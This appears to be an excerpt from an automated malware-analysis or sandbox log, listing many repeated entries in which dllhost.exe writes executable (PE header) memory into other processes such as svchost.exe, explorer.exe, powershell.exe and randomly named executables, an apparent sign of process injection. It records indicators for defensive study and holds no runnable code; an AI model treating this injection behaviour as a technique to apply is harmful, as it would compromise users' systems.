Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 23A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DBF9DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FB7270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 192913B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 139F96A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 9850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B469900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\$nya-onimai2\qVrKPA.exe base: 1910E810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 227C08C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 247B4700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1DAD8A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE3F3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EC87880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1C39C960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 10C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 20F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 15D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 26D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 30C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 28E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 29F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 840000 value starts with: 4D5A
